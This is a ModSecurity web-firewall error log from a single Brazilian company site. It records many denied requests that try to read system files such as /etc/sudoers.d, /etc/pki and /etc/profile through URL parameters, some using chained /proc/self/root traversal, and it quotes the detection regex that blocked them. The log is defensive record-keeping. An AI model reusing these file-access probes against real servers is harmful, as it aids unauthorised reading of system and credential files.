[Fri Mar 20 05:31:58.124994 2026] [:error] [pid 10189:tid 140411683178240] [client 74.7.241.31:56776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0F_jJ3M9BSuKP7CAb1twAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 05:31:58.333995 2026] [:error] [pid 31215:tid 140411607643904] [client 57.141.18.32:58796] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_gF0L0L-SsrnPo5KjQAAAtA"]
[Fri Mar 20 05:31:58.335193 2026] [:error] [pid 11167:tid 140411691570944] [client 57.141.18.56:58798] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_vHIg5MgXLBnicPcOAAAAcY"]
[Fri Mar 20 05:31:59.069336 2026] [:error] [pid 7235:tid 140411725141760] [client 57.141.18.95:58774] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F__qxLDW4GITHUkTFhAAAAQI"]
[Fri Mar 20 05:31:59.213329 2026] [:error] [pid 11167:tid 140411741927168] [client 57.141.18.99:58814] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F__HIg5MgXLBnicPcOQAAAcA"]
[Fri Mar 20 05:31:59.588207 2026] [:error] [pid 11642:tid 140411658000128] [client 57.141.18.74:58818] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F_7ninkcc-iUj5ApBVAAAA4o"]
[Fri Mar 20 05:31:59.845690 2026] [:error] [pid 11167:tid 140411574073088] [client 57.141.18.76:58822] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0F__HIg5MgXLBnicPcOgAAAdQ"]
[Fri Mar 20 05:32:00.154849 2026] [:error] [pid 21219:tid 140411641214720] [client 57.141.18.80:58830] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAPXLqtnMIWvjpaJ8xwAAAow"]
[Fri Mar 20 05:32:00.640856 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.67:58844] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GABCii7xarUs8iHZJuwAAAhg"]
[Fri Mar 20 05:32:00.762990 2026] [:error] [pid 9818:tid 140411699963648] [client 57.141.18.22:58848] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/wgetrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAF1pVZ5mVmJwsFMSZgAAAEU"]
[Fri Mar 20 05:32:02.724065 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.14:58868] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAvXLqtnMIWvjpaJ8yAAAAoE"]
[Fri Mar 20 05:32:04.161869 2026] [:error] [pid 31215:tid 140411590858496] [client 57.141.18.4:58832] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAQF0L0L-SsrnPo5KkAAAAtI"]
[Fri Mar 20 05:32:04.165034 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.8:58870] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAjJ3M9BSuKP7CAb1uAAAAI0"]
[Fri Mar 20 05:32:04.172456 2026] [:error] [pid 9818:tid 140411540502272] [client 57.141.18.28:58862] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAV1pVZ5mVmJwsFMSaAAAAFg"]
[Fri Mar 20 05:32:04.173837 2026] [:error] [pid 31215:tid 140411658000128] [client 57.141.18.92:58878] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAwF0L0L-SsrnPo5KlAAAAso"]
[Fri Mar 20 05:32:04.174372 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.48:58866] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GAuoXxyEfFpUF8f9kbQAAAUg"]
[Fri Mar 20 05:32:04.203455 2026] [:error] [pid 10189:tid 140411658000128] [client 57.141.18.40:58894] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBDJ3M9BSuKP7CAb1uQAAAIo"]
[Fri Mar 20 05:32:04.411799 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.19:58904] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBPXLqtnMIWvjpaJ8yQAAAo4"]
[Fri Mar 20 05:32:05.056951 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.31:58880] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBeoXxyEfFpUF8f9kbwAAAUM"]
[Fri Mar 20 05:32:05.256119 2026] [:error] [pid 31215:tid 140411540502272] [client 57.141.18.99:58876] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBQF0L0L-SsrnPo5KlQAAAtg"]
[Fri Mar 20 05:32:05.542038 2026] [:error] [pid 31215:tid 140411548894976] [client 57.141.18.38:58856] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBQF0L0L-SsrnPo5KlgAAAtc"]
[Fri Mar 20 05:32:06.035214 2026] [:error] [pid 11642:tid 140411716749056] [client 57.141.18.52:58948] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBrninkcc-iUj5ApBXQAAA4M"]
[Fri Mar 20 05:32:06.172305 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.83:58954] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBuoXxyEfFpUF8f9kcwAAAU0"]
[Fri Mar 20 05:32:06.390571 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.50:58964] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBuoXxyEfFpUF8f9kdQAAAUw"]
[Fri Mar 20 05:32:06.931070 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.16:58982] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/csh.login"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBuoXxyEfFpUF8f9kdwAAAUU"]
[Fri Mar 20 05:32:07.296081 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.71:59016] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GB_XLqtnMIWvjpaJ8zQAAAoo"]
[Fri Mar 20 05:32:07.440781 2026] [:error] [pid 11167:tid 140411624429312] [client 57.141.18.38:59032] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GB_HIg5MgXLBnicPcPAAAAc4"]
[Fri Mar 20 05:32:07.924354 2026] [:error] [pid 31215:tid 140411674785536] [client 57.141.18.121:59002] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/frigorific/incinerated011854637624.phtml"] [unique_id "ab0GBwF0L0L-SsrnPo5KmgAAAsg"]
